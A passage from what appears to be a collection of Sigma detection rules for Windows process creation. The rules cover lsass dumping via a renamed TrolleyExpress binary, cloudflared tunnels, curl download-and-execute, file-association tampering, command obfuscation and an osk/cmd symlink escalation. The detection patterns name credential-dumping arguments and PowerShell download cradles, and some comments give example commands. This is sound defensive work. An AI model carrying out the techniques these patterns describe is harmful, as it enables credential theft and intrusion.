    "path": "rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml",
    "content": "title: Process Access via TrolleyExpress Exclusion\nid: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6\nstatus: test\ndescription: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory\nreferences:\n    - https://twitter.com/_xpn_/status/1491557187168178176\n    - https://www.youtube.com/watch?v=Ie831jF0bb0\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-10\nmodified: 2022-05-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n      # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter\n            - '\\TrolleyExpress 7'\n            - '\\TrolleyExpress 8'\n            - '\\TrolleyExpress 9'\n            - '\\TrolleyExpress.exe 7'\n            - '\\TrolleyExpress.exe 8'\n            - '\\TrolleyExpress.exe 9'\n      # Common dumpers\n            - '\\TrolleyExpress.exe -ma '\n    renamed:\n        Image|endswith: '\\TrolleyExpress.exe'\n    filter_renamed:\n        OriginalFileName|contains: 'CtxInstall'\n    filter_empty:\n        OriginalFileName: null\n    condition: selection or ( renamed and not 1 of filter* )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_clip_execution.yml",
    "content": "title: Data Copied To Clipboard Via Clip.EXE\nid: ddeff553-5233-4ae9-bbab-d64d2bd634be\nstatus: test\ndescription: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md\nauthor: frack113\ndate: 2021-07-27\nmodified: 2023-02-21\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\clip.exe'\n        - OriginalFileName: clip.exe\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Utilize Clipboard to store or execute commands from\n      technique: T1115\n      atomic_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml",
    "content": "title: Cloudflared Portable Execution\nid: fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd\nstatus: test\ndescription: |\n    Detects the execution of the \"cloudflared\" binary from a non standard location.\nreferences:\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\n    - https://github.com/cloudflare/cloudflared\n    - https://www.intrinsec.com/akira_ransomware/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n    - https://github.com/cloudflare/cloudflared/releases\nauthor: Nasreddine Bencherchali (Nextron Systems)\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\ndate: 2023-12-20\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cloudflared.exe'\n    filter_main_admin_location:\n        Image|contains:\n            - ':\\Program Files (x86)\\cloudflared\\'\n            - ':\\Program Files\\cloudflared\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage of Cloudflared portable versions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml",
    "content": "title: Cloudflared Quick Tunnel Execution\nid: 222129f7-f4dc-4568-b0d2-22440a9639ba\nrelated:\n    - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a\n      type: similar\n    - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.\n    The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.\n    The tool has been observed in use by threat groups including Akira ransomware.\nreferences:\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\n    - https://github.com/cloudflare/cloudflared\n    - https://www.intrinsec.com/akira_ransomware/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\nauthor: Sajid Nawaz Khan\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\ndate: 2023-12-20\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cloudflared.exe'\n              - '\\cloudflared-windows-386.exe'\n              - '\\cloudflared-windows-amd64.exe'\n        - Hashes|contains:\n              - 'SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29'\n              - 'SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8'\n              - 'SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039'\n              - 'SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28'\n              - 'SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7'\n              - 'SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373'\n              - 'SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670'\n              - 'SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a'\n              - 'SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0'\n              - 'SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1'\n              - 'SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2'\n              - 'SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac'\n              - 'SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f'\n              - 'SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d'\n              - 'SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499'\n              - 'SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b'\n              - 'SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f'\n              - 'SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032'\n              - 'SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234'\n              - 'SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f'\n              - 'SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058'\n              - 'SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c'\n              - 'SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f'\n              - 'SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5'\n              - 'SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3'\n              - 'SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4'\n              - 'SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c'\n              - 'SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4'\n              - 'SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f'\n              - 'SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad'\n              - 'SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7'\n              - 'SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75'\n              - 'SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6'\n              - 'SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688'\n              - 'SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f'\n              - 'SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663'\n              - 'SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77'\n              - 'SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078'\n    # Note:\n    #   Accounts for the cloudflared binaries being renamed\n    #   `tunnel` is optional, but has been included to reduce the possibility of parameter collision when not observed with known binary names\n    selection_param:\n        - CommandLine|contains|all:\n              - '-url'\n              - 'tunnel'\n        - CommandLine|contains:\n              - '.exe -url'\n              - '.exe --url'\n    selection_other:\n        CommandLine|contains|all:\n            - '-url'\n            - '-no-autoupdate'\n    condition: (selection_img and selection_param) or selection_other\nfalsepositives:\n    - Legitimate usage of Cloudflare Quick Tunnel\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml",
    "content": "title: Cloudflared Tunnel Connections Cleanup\nid: 7050bba1-1aed-454e-8f73-3f46f09ce56a\nstatus: test\ndescription: Detects execution of the \"cloudflared\" tool with the tunnel \"cleanup\" flag in order to cleanup tunnel connections.\nreferences:\n    - https://github.com/cloudflare/cloudflared\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-17\nmodified: 2023-12-21\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1090\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - 'cleanup '\n        CommandLine|contains:\n            - '-config '\n            - '-connector-id '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of Cloudflared.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml",
    "content": "title: Cloudflared Tunnel Execution\nid: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4\nstatus: test\ndescription: Detects execution of the \"cloudflared\" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.\nreferences:\n    - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group\n    - https://github.com/cloudflare/cloudflared\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps\nauthor: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-17\nmodified: 2023-12-20\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1090\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - ' run '\n        CommandLine|contains:\n            - '-config '\n            - '-credentials-contents '\n            - '-credentials-file '\n            - '-token '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of Cloudflared tunnel.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml",
    "content": "title: Change Default File Association Via Assoc\nid: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061\nrelated:\n    - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89\n      type: similar\nstatus: test\ndescription: |\n    Detects file association changes using the builtin \"assoc\" command.\n    When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains: 'assoc'\n    condition: all of selection_*\nfalsepositives:\n    - Admin activity\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml",
    "content": "title: Change Default File Association To Executable Via Assoc\nid: ae6f14e6-14de-45b0-9f44-c0986f50dc89\nrelated:\n    - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061\n      type: derived\nstatus: test\ndescription: |\n    Detects when a program changes the default file association of any extension to an executable.\n    When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'assoc '\n            - 'exefile'\n    filter:\n        CommandLine|contains: '.exe=exefile'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml",
    "content": "title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE\nid: 044ba588-dff4-4918-9808-3f95e8160606\nstatus: test\ndescription: Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\nmodified: 2023-09-12\ntags:\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: copy \\\\<host>\\\\<folder>\\\\process.dmp C:\\Users\\process.dmp\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'copy '\n            - ' \\\\\\\\'\n        CommandLine|contains:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml",
    "content": "title: Curl Download And Execute Combination\nid: 21dd6d38-2b18-4453-9404-a0fe4a0cc288\nstatus: test\ndescription: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.\nreferences:\n    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link\nauthor: Sreeman, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-01-13\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|windash: ' -c '\n        CommandLine|contains|all:\n            - 'curl '\n            - 'http'\n            - '-o'\n            - '&'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml",
    "content": "title: File Deletion Via Del\nid: 379fa130-190e-4c3f-b7bc-6c8e834485f3\nstatus: test\ndescription: |\n    Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\n    Adversaries may delete files left behind by the actions of their intrusion activity.\n    Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\n    Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nauthor: frack113\ndate: 2022-01-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_del:\n        CommandLine|contains:\n            - 'del '\n            - 'erase '\n    selection_flags:\n        CommandLine|contains|windash:\n            - ' -f' # Force deleting of read-only files.\n            - ' -s' # Delete specified files from all subdirectories.\n            - ' -q' # Quiet mode, do not ask if ok to delete on global wildcard\n    condition: all of selection_*\nfalsepositives:\n    - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml",
    "content": "title: Greedy File Deletion Using Del\nid: 204b17ae-4007-471b-917b-b917b315c5db\nstatus: test\ndescription: Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.\nreferences:\n    - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nauthor: frack113 , X__Junior (Nextron Systems)\ndate: 2021-12-02\nmodified: 2023-09-11\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example:\n    #   del C:\\ProgramData\\*.dll & exit\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_del:\n        CommandLine|contains:\n            - 'del '\n            - 'erase '\n    selection_extensions:\n        CommandLine|contains:\n            - '\\\\\\*.au3'\n            - '\\\\\\*.dll'\n            - '\\\\\\*.exe'\n            - '\\\\\\*.js'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml",
    "content": "title: File And SubFolder Enumeration Via Dir Command\nid: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006\nstatus: test\ndescription: |\n    Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nauthor: frack113\ndate: 2021-12-13\nmodified: 2024-04-14\ntags:\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: Cmd.Exe\n    selection_cli:\n        CommandLine|contains|windash: 'dir*-s'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: List Internet Explorer Bookmarks using the command prompt\n      technique: T1217\n      atomic_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml",
    "content": "title: Potential Dosfuscation Activity\nid: a77c1610-fc73-4019-8e29-0f51efc04a51\nstatus: test\ndescription: Detects possible payload obfuscation via the commandline\nreferences:\n    - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf\n    - https://github.com/danielbohannon/Invoke-DOSfuscation\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-15\nmodified: 2023-03-06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '^^'\n            - '^|^'\n            - ',;,'\n            - ';;;;'\n            - ';; ;;'\n            - '(,(,'\n            - '%COMSPEC:~'\n            - ' c^m^d'\n            - '^c^m^d'\n            - ' c^md'\n            - ' cm^d'\n            - '^cm^d'\n            - ' s^et '\n            - ' s^e^t '\n            - ' se^t '\n            # - '%%'\n            # - '&&'\n            # - '\"\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml",
    "content": "title: Command Line Execution with Suspicious URL and AppData Strings\nid: 1ac8666b-046f-4201-8aba-1951aaec03a3\nstatus: test\ndescription: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)\nreferences:\n    - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100\n    - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2019-01-16\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'http' # captures both http and https\n            - '://'\n            - '%AppData%'\n    condition: selection\nfalsepositives:\n    - High\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag.yml",
    "content": "title: Cmd Launched with Hidden Start Flags to Suspicious Targets\nid: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d\nstatus: experimental\ndescription: |\n    Detects cmd.exe executing commands with the \"start\" utility using \"/b\" (no window) or \"/min\" (minimized) flags.\n    To reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories.\n    This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.\nreferences:\n    - https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous\n    - https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\n    - https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start\ntags:\n    - attack.defense-evasion\n    - attack.t1564.003\nauthor: Vladan Sekulic, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-24\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cmd_hidden_start_1:\n        CommandLine|contains|windash:\n            - 'start '\n            - 'start/b'\n            - 'start/min'\n    selection_cmd_hidden_start_2:\n        CommandLine|contains|windash:\n            - '/b '\n            - '/b\"'\n            - '/min '\n            - '/min\"'\n    selection_cli_uncommon_location:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Documents\\'\n            - 
'\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\'\n            - '\\Music\\'\n            - '\\Photos\\'\n            - '\\Temporary Internet\\'\n            - '\\Users\\Public\\'\n            - '\\Videos\\'\n    selection_cli_susp_extension:\n        CommandLine|contains:\n            - '.bat'\n            - '.cmd'\n            - '.cpl'\n            - '.hta'\n            - '.js'\n            - '.ps1'\n            - '.scr'\n            - '.vbe'\n            - '.vbs'\n    selection_cli_susp_pattern:\n        CommandLine|contains:\n            - ' -nop '\n            - ' -sta '\n            - '.downloadfile(' # PowerShell download command\n            - '.downloadstring(' # PowerShell download command\n            - '-noni '\n            - '-w hidden '\n    condition: all of selection_cmd_* and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate administrative scripts running from temporary folders.\n    - Niche software updaters utilizing hidden batch files in ProgramData.\nlevel: medium # Can be increased after an initial baseline and tuning\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml",
    "content": "title: Potential Privilege Escalation Using Symlink Between Osk and Cmd\nid: e9b61244-893f-427c-b287-3e708f321c6b\nstatus: test\ndescription: Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md\n    - https://ss64.com/nt/mklink.html\nauthor: frack113\ndate: 2022-12-11\nmodified: 2022-12-20\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.008\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'mklink'\n            - '\\osk.exe'\n            - '\\cmd.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml",
    "content": "title: VolumeShadowCopy Symlink Creation Via Mklink\nid: 40b19fa6-d835-400c-b301-41f3a2baacaf\nstatus: stable\ndescription: Shadow Copies storage symbolic link creation using operating systems utilities\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2023-03-06\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'mklink'\n            - 'HarddiskVolumeShadowCopy'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator working with shadow copies, access for backup purposes\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml",
    "content": "title: Suspicious File Execution From Internet Hosted WebDav Share\nid: f0507c0f-a3a2-40f5-acc6-7f543c334993\nstatus: test\ndescription: Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files\nreferences:\n    - https://twitter.com/ShadowChasing1/status/1552595370961944576\n    - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior\nauthor: pH-T (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.EXE'\n    selection_base:\n        CommandLine|contains|all:\n            - ' net use http'\n            - '& start /b '\n            - '\\DavWWWRoot\\'\n    selection_ext:\n        CommandLine|contains:\n            - '.exe '\n            - '.dll '\n            - '.bat '\n            - '.vbs '\n            - '.ps1 '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml",
    "content": "title: Cmd.EXE Missing Space Characters Execution Anomaly\nid: a16980c2-0c56-4de0-9a79-17971979efdd\nstatus: test\ndescription: |\n    Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\n    This could be a sign of obfuscation of a fat finger problem (typo by the developer).\nreferences:\n    - https://twitter.com/cyb3rops/status/1562072617552678912\n    - https://ss64.com/nt/cmd.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-23\nmodified: 2023-03-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:  # missing space before the /c\n        CommandLine|contains:\n            - 'cmd.exe/c'\n            - '\\cmd/c'  # just cmd/c would be prone to false positives\n            - '\"cmd/c'\n            - 'cmd.exe/k'\n            - '\\cmd/k'  # just cmd/k would be prone to false positives\n            - '\"cmd/k'\n            - 'cmd.exe/r'\n            - '\\cmd/r'  # just cmd/r would be prone to false positives\n            - '\"cmd/r'\n    selection2: # special cases verified via Virustotal Enterprise search\n        CommandLine|contains:\n            - '/cwhoami'\n            - '/cpowershell'\n            - 